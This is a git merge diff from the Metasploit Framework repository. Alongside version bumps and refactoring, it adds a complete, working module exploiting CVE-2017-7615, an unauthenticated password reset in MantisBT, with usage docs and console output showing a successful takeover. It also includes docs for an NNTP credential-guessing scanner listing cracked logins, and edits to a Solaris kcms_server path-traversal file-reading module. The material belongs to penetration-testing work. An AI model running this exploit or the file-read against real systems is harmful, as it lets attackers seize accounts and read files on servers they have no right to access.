Merge branch 'master' into kill-cucumber

Author: dmaloney-r7

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.15.0)
+    metasploit-framework (4.15.1)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md

@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
+on
+[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
+
+## Verification Steps
+
+  1. Install the vulnerable software
+  2. Start msfconsole
+  3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
+  4. Do: ```set rhost```
+  5. Do: ```run```
+  6. If the system is vulnerable, the module should tell you that the password
+     was successfully changed.
+
+## Scenarios
+
+  ```
+   msf > use auxiliary/admin/http/mantisbt_password_reset
+   msf auxiliary(mantisbt_password_reset) > set rport 8082
+   rport => 8082
+   msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
+   rhost => 127.0.0.1
+   msf auxiliary(mantisbt_password_reset) > run
+   
+   [+] Password successfully changed to 'ndOQTmhQ'.
+   [*] Auxiliary module execution completed
+   msf auxiliary(mantisbt_password_reset) > 
+  ```

documentation/modules/auxiliary/scanner/nntp/nntp_login.md

@@ -0,0 +1,42 @@
+## Description
+
+  This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
+
+  This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
+
+  If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
+  * [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
+  * [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
+
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/nntp/nntp_login`
+  2. Do: `set RHOSTS [IP]`
+  3. Do: `set RPORT [IP]`
+  4. Do: `run`
+
+
+## Scenarios
+
+  ```
+  msf auxiliary(nntp_login) > run
+
+  [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
+  [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
+  [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
+  [*] Scanned 1 of 2 hosts (50% complete)
+  [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
+  [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
+  [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
+  [*] Scanned 2 of 2 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.15.0"
+      VERSION = "4.15.1"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/exploit/sunrpc.rb

@@ -16,8 +16,6 @@ module Msf
 module Exploit::Remote::SunRPC
   include Exploit::Remote::Tcp
 
-  XDR = Rex::Encoder::XDR
-
   MSG_ACCEPTED = 0
   SUCCESS = 0		# RPC executed successfully
   PROG_UMAVAIL = 1	# Remote hasn't exported program
@@ -72,7 +70,7 @@ def sunrpc_create(protocol, program, version, time_out = timeout)
     ret = rpcobj.create
     raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to Portmap request" unless ret
 
-    arr = XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
+    arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
     if arr[1] != MSG_ACCEPTED || arr[4] != SUCCESS || arr[5] == 0
       err = "#{rhost}:#{rport} - SunRPC - Portmap request failed: "
       err << 'Message not accepted'  if arr[1] != MSG_ACCEPTED

lib/msf/ui/console/command_dispatcher/resource.rb

@@ -37,8 +37,8 @@ def name
           def cmd_resource_help
             print_line "Usage: resource path1 [path2 ...]"
             print_line
-            print_line "Run the commands stored in the supplied files.  Resource files may also contain"
-            print_line "ruby code between <ruby></ruby> tags."
+            print_line "Run the commands stored in the supplied files (- for stdin)."
+            print_line "Resource files may also contain ERB or Ruby code between <ruby></ruby> tags."
             print_line
             print_line "See also: makerc"
             print_line
@@ -52,21 +52,23 @@ def cmd_resource(*args)
 
             args.each do |res|
               good_res = nil
-              if ::File.exist?(res)
+              if res == '-'
+                good_res = res
+              elsif ::File.exist?(res)
                 good_res = res
               elsif
                 # let's check to see if it's in the scripts/resource dir (like when tab completed)
-              [
-                ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
-                ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
-              ].each do |dir|
-                res_path = dir + ::File::SEPARATOR + res
-                if ::File.exist?(res_path)
-                  good_res = res_path
-                  break
+                [
+                  ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
+                  ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
+                ].each do |dir|
+                  res_path = dir + ::File::SEPARATOR + res
+                  if ::File.exist?(res_path)
+                    good_res = res_path
+                    break
+                  end
                 end
               end
-              end
               if good_res
                 driver.load_resource(good_res)
               else

lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb

@@ -373,7 +373,7 @@ def File.download_file(dest_file, src_file, opts = nil, &stat)
     end
 
     # Keep transferring until EOF is reached...
-    block_size = opts['block_size'] || 1024 * 1024
+    block_size = (opts && opts['block_size']) || 1024 * 1024
     begin
       if tries
         # resume when timeouts encountered

modules/auxiliary/admin/http/mantisbt_password_reset.rb

@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'       => "MantisBT password reset",
+      'Description'  => %q{
+        MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'     =>
+        [
+          'John (hyp3rlinx) Page',  # initial discovery
+          'Julien (jvoisin) Voisin' # metasploit module
+        ],
+      'References'   =>
+        [
+          ['CVE', '2017-7615'],
+          ['EDB', '41890'],
+          ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],
+          ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
+        ],
+      'Platform'     => ['win', 'linux'],
+      'DisclosureDate' => "Apr 16 2017"))
+
+      register_options(
+        [
+          OptString.new('USERID', [ true, 'User id to reset', 1]),
+          OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),
+          OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
+        ]
+      )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, '/login_page.php'),
+        'method'=>'GET'
+      })
+
+      if res && res.body && res.body.include?('Powered by <a href="http://www.mantisbt.org" title="bug tracking software">MantisBT')
+        vprint_status("MantisBT detected")
+        return Exploit::CheckCode::Detected
+      else
+        vprint_status("Not a MantisBT Instance!")
+        return Exploit::CheckCode::Safe
+      end
+
+    rescue Rex::ConnectionRefused
+      print_error("Connection refused by server.")
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/verify.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'id' => datastore['USERID'],
+        'confirm_hash' => ''
+      }
+    })
+
+    if !res || !res.body
+      fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
+    end
+
+    cookie = res.get_cookies
+
+    if cookie == '' || !(res.body.include? 'Your account information has been verified.')
+      fail_with(Failure::NoAccess, "Authentication failed")
+    end
+
+
+    if datastore['PASSWORD'].blank?
+      password = Rex::Text.rand_text_alpha(8)
+    else
+      password = datastore['PASSWORD']
+    end
+
+    if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
+      token = $1
+    else
+      fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/account_update.php'),
+      'method' => 'POST',
+      'vars_post' => {
+          'verify_user_id' => datastore['USERID'],
+          'account_update_token' => $1,
+          'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),
+          'password' => password,
+          'password_confirm' => password
+        },
+      'cookie' => cookie
+    })
+
+    if res && res.body && res.body.include?('Password successfully updated')
+      print_good("Password successfully changed to '#{password}'.")
+    else
+      fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')
+    end
+  end
+end

modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb

@@ -66,14 +66,14 @@ def run
 
     # Prepare the traversing request for kcms_server
     trav = 'TT_DB/' + ('../' * 5) + path
-    buf = XDR.encode(
+    buf = Rex::Encoder::XDR.encode(
       [trav, 1024],
       0, # O_RDONLY
       0755) # mode
 
     # Make the request
     ret = sunrpc_call(1003, buf)
-    ack, fsize, fd = XDR.decode!(ret, Integer, Integer, Integer)
+    ack, fsize, fd = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer)
 
     if (ack != 0)
       print_error("KCMS open() failed (ack: 0x%x != 0)" % ack)
@@ -88,13 +88,13 @@ def run
     print_status("fd: #{fd}, file size #{fsize}")
 
     print_status("Making read() request to the kcms_server...")
-    buf = XDR.encode(
+    buf = Rex::Encoder::XDR.encode(
       fd,
       0,
       fsize)
 
     ret = sunrpc_call(1005, buf)
-    x, data = XDR.decode!(ret, Integer, [Integer])
+    x, data = Rex::Encoder::XDR.decode!(ret, Integer, [Integer])
 
     # If we got something back...
     if (data)
@@ -118,7 +118,7 @@ def run
 
     # Close it regardless if it returned anything..
     print_status("Making close() request to the kcms_server...")
-    buf = XDR.encode(fd)
+    buf = Rex::Encoder::XDR.encode(fd)
     sunrpc_call(1004, buf)
 
     # done
@@ -138,7 +138,7 @@ def run
   def ttdb_build(path)
     sunrpc_create('tcp', 100083, 1)
     sunrpc_authunix('localhost', 0, 0, [])
-    msg = XDR.encode(
+    msg = Rex::Encoder::XDR.encode(
       [path, 1024],
       path.length,
       1, # KEY (VArray head?)
@@ -152,7 +152,7 @@ def ttdb_build(path)
       0x10002,
       path.length)
     ret = sunrpc_call(3, msg)
-    arr = XDR.decode!(ret, Integer, Integer)
+    arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer)
     print_status("TTDB reply: 0x%x, %d" % arr)
     sunrpc_destroy
   end

modules/auxiliary/scanner/misc/sunrpc_portmapper.rb

@@ -40,8 +40,8 @@ def run_host(ip)
       progs = resp[3, 1].unpack('C')[0]
       maps = []
       if (progs == 0x01)
-        while XDR.decode_int!(resp) == 1
-          maps << XDR.decode!(resp, Integer, Integer, Integer, Integer)
+        while Rex::Encoder::XDR.decode_int!(resp) == 1
+          maps << Rex::Encoder::XDR.decode!(resp, Integer, Integer, Integer, Integer)
         end
       end
       sunrpc_destroy